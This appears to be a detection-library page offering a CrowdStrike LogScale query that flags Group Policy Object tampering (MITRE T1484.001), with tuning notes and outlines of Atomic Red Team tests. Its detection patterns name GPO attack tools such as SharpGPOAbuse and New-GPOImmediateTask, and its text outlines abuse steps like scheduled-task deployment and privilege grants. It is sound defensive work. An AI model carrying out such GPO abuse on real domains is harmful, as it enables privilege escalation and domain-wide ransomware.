Detect Group Policy Modification in CrowdStrike LogScale
Adversaries may modify Group Policy Objects (GPOs) to subvert intended access controls across a Windows domain, typically to escalate privileges, disable security tools, or enable mass payload distribution. GPOs stored in SYSVOL control centralized user and computer settings across Active Directory environments. Malicious GPO modifications can deploy scheduled tasks, create accounts, grant dangerous privileges like SeEnableDelegationPrivilege, or push ransomware to every domain-joined machine simultaneously. LockBit 2.0/3.0 and Qilin ransomware modified GPOs to disable Windows Defender and propagate malware domain-wide. APT41 used GPO-deployed scheduled tasks for coordinated ransomware deployment. Indrik Spider (Evil Corp), Cinnamon Tempest, and Storm-0501 have all leveraged GPO modification for lateral movement and payload execution at scale. The Empire framework's New-GPOImmediateTask cmdlet and SharpGPOAbuse tool provide ready-made capabilities for GPO abuse by threat actors with sufficient AD permissions.
MITRE ATT&CK
- Sub-technique
- T1484.001 Group Policy Modification
- Canonical reference
- https://attack.mitre.org/techniques/T1484/001/
LogScale Detection Query
// T1484.001 — Group Policy Modification
// Branch 1: PowerShell executing GPO management cmdlets or known attack tools
#event_simpleName=ProcessRollup2
| ImageFileName=/(?i)(powershell\.exe|pwsh\.exe)/
| CommandLine=/(?i)(New-GPOImmediateTask|New-GPPImmediateTask|New-GPO\s|Set-GPOLink|Import-GPO|Set-GPPermissions|SharpGPOAbuse|Invoke-GPOZaurr|SeEnableDelegationPrivilege|GptTmpl\.inf|Get-GPPermissions|New-GPLink|Set-GPRegistryValue)/
| IsAttackTool := if(CommandLine=/(?i)(SharpGPOAbuse|Invoke-GPOZaurr|New-GPOImmediateTask|SeEnableDelegationPrivilege)/, "true", "false")
| DetectionSource := "PowerShell_GPOTools"
| union {
// Branch 2: SYSVOL file write events — GPO policy content modification
#event_simpleName=FileWritten
| TargetFileName=/(?i)\\sysvol\\/
| TargetFileName=/(?i)(ScheduledTasks\.xml|GptTmpl\.inf|GPT\.INI|Registry\.xml|Startup\.xml|Shutdown\.xml|Groups\.xml|Services\.xml|Files\.xml)/
| IsHighRisk := if(TargetFileName=/(?i)(ScheduledTasks\.xml|GptTmpl\.inf)/, "true", "false")
| DetectionSource := "SYSVOL_FileSystem"
| IsAttackTool := "false"
}
| union {
// Branch 3: PowerShell script block telemetry — catches obfuscated/encoded GPO operations
#event_simpleName=ScriptControlScanTelemetry
| ScriptContent=/(?i)(New-GPOImmediateTask|SharpGPOAbuse|Invoke-GPOZaurr|Set-GPPermissions|SeEnableDelegationPrivilege|GptTmpl\.inf|New-GPO\s|Set-GPOLink|Import-GPO)/
| IsAttackTool := if(ScriptContent=/(?i)(SharpGPOAbuse|Invoke-GPOZaurr|New-GPOImmediateTask|SeEnableDelegationPrivilege)/, "true", "false")
| DetectionSource := "PSScriptBlock_GPOTools"
| IsHighRisk := IsAttackTool
}
| table([#event_simpleName, @timestamp, ComputerName, UserName, ImageFileName, CommandLine, TargetFileName, ScriptContent, IsAttackTool, IsHighRisk, DetectionSource])
| sort(field=@timestamp, order=desc)CrowdStrike LogScale (Falcon CQL) detection for T1484.001 Group Policy Modification across three Falcon telemetry streams: (1) ProcessRollup2 events for PowerShell executing GPO management cmdlets (New-GPOImmediateTask, Import-GPO, Set-GPPermissions) and known attack tools (SharpGPOAbuse, Invoke-GPOZaurr), (2) FileWritten events targeting SYSVOL paths with critical GPO policy file names, and (3) ScriptControlScanTelemetry for PowerShell script block logging to catch obfuscated or encoded GPO abuse commands that evade process command-line matching. The IsAttackTool flag distinguishes known offensive tools from legitimate admin cmdlets.
Data Sources
Required Tables
False Positives & Tuning
- Authorized domain administrators running GPO management scripts via PowerShell RSAT — ProcessRollup2 and ScriptControlScanTelemetry events will fire on legitimate New-GPO, Set-GPOLink, and Set-GPRegistryValue cmdlet invocations; correlate UserName against a domain admin allowlist and verify activity aligns with a change ticket
- SYSVOL DFS-R replication on domain controllers generates FileWritten events as GPO policy files propagate from the PDC emulator to replica DCs — these events appear on non-PDC domain controllers with the DFS Replication service account as the writing process; filter on UserName for SYSTEM or DFS-R service accounts during expected replication windows
- Automated compliance and hardening tooling (PowerShell DSC, Puppet, Chef, Ansible) running as service accounts that use Set-GPRegistryValue or Import-GPO for idempotent policy enforcement — these produce recurring ProcessRollup2 matches on a schedule; baseline these service account + cmdlet combinations and suppress recurrences with allowlist rules in Falcon Fusion
Other platforms for T1484.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Create Malicious Scheduled Task via GPO (New-GPOImmediateTask)
Expected signal: Security Event ID 5137 on Domain Controller: GPO container object created (ObjectClass=groupPolicyContainer). Security Event ID 5136 on DC: gPCMachineExtensionNames attribute added (indicating new machine policy CSE). Sysmon Event ID 11: File Create for ScheduledTasks.xml in SYSVOL path from PowerShell process. Security Event ID 5136: versionNumber attribute incremented on GPO object. PowerShell ScriptBlock Log (Event ID 4104) capturing New-GPO, New-GPLink, and file write operations.
- Test 2Modify GptTmpl.inf to Grant SeEnableDelegationPrivilege
Expected signal: Sysmon Event ID 11: File Create for GptTmpl.inf in SYSVOL path (\\DOMAIN\SYSVOL\DOMAIN\Policies\{GUID}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf). Security Event ID 5136 on DC: gPCMachineExtensionNames updated to include security extension GUID {827D319E-6EAC-11D2-A4EA-00C04F79F83A} (Security). versionNumber increment. PowerShell ScriptBlock Log Event ID 4104 capturing the file write and SYSVOL path construction.
- Test 3Enumerate GPO Permissions with PowerView (Recon Phase)
Expected signal: PowerShell ScriptBlock Log Event ID 4104: Get-GPPermissions cmdlet execution with -All parameter iterating across all GPOs. Sysmon Event ID 1: powershell.exe process creation with Get-GPPermissions and Get-GPO in command line. Active Directory query events may appear in Domain Controller logs for LDAP searches against CN=Policies.
- Test 4Deploy Ransomware Simulation via GPO Startup Script
Expected signal: Sysmon Event ID 11: File Create events for startup.bat and scripts.ini in SYSVOL path from powershell.exe. Security Event ID 5136 on DC: gPCMachineExtensionNames updated to include scripts CSE GUID {42B5FAAE-6536-11D2-AE5A-0000F87571E3}. versionNumber attribute incremented. PowerShell ScriptBlock Log Event ID 4104 with SYSVOL path construction and file write commands.
References (9)
- https://attack.mitre.org/techniques/T1484/001/
- https://wald0.com/?p=179
- https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- https://adsecurity.org/?p=2716
- https://github.com/FSecureLABS/SharpGPOAbuse
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md
Unlock Pro Content
Get the full detection package for T1484.001 including response playbook, investigation guide, and atomic red team tests.